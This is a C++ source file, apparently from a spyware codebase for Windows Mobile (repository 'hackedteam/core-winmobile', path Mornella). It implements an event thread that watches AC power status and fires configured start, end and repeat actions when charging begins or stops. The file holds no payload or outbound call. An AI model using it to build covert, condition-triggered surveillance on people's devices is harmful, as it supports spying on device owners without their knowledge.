hackedteam/core-winmobile

View on GitHub
Mornella/Mornella_Mobile/Ac.cpp

Summary

Maintainability
Test Coverage
#include "Event.h"
#include "Common.h"
#include "Conf.h"
#include "Date.h"
#include "Log.h"
#include <pm.h>
#include "CallBacks.h"
#include "Device.h"

DWORD WINAPI OnAC(LPVOID lpParam) {
    Event *me = (Event *)lpParam;
    Configuration *conf;
    HANDLE eventHandle;
    int delay, iterations, curIterations = 0, curDelay = 0;
    const SYSTEM_POWER_STATUS_EX2 *pBattery = NULL;
    BOOL bAC = FALSE;
    DWORD dwAcStatus = 0;
    Device *deviceObj = Device::self();

    eventHandle = me->getEvent();

    me->setStatus(EVENT_RUNNING);
    conf = me->getConf();

    try {
        iterations = conf->getInt(L"iter");
    } catch (...) {
        iterations = MAXINT;
    }

    try {
        delay = conf->getInt(L"delay") * 1000;
    } catch (...) {
        delay = INFINITE;
    }

    deviceObj->RefreshBatteryStatus();
    pBattery = deviceObj->GetBatteryStatus();
    dwAcStatus = pBattery->ACLineStatus;

    if (deviceObj->RegisterPowerNotification(AcCallback, (DWORD)&dwAcStatus) == FALSE) {
        me->setStatus(EVENT_STOPPED);
        return 0;
    }

    LOOP {
        if (dwAcStatus == AC_LINE_ONLINE && bAC == FALSE) {
            bAC = TRUE;
            DBG_TRACE(L"Debug - Ac.cpp - Ac event [IN action triggered]\n", 5, FALSE);
            me->triggerStart();
        }

        if (dwAcStatus == AC_LINE_OFFLINE && bAC == TRUE) {
            bAC = FALSE;
            DBG_TRACE(L"Debug - Ac.cpp - AC event [OUT action triggered]\n", 5, FALSE);
            me->triggerEnd();
        }

        if (bAC)
            curDelay = delay;
        else
            curDelay = 10000;

        WaitForSingleObject(eventHandle, curDelay);

        if (me->shouldStop()) {
            DBG_TRACE(L"Debug - Events.cpp - Ac Event is Closing\n", 1, FALSE);
            deviceObj->UnRegisterPowerNotification(AcCallback);
            me->setStatus(EVENT_STOPPED);
            return 0;
        }

        if (bAC && curIterations < iterations) {
            me->triggerRepeat();
            curIterations++;
        }
    }

    return 0;
}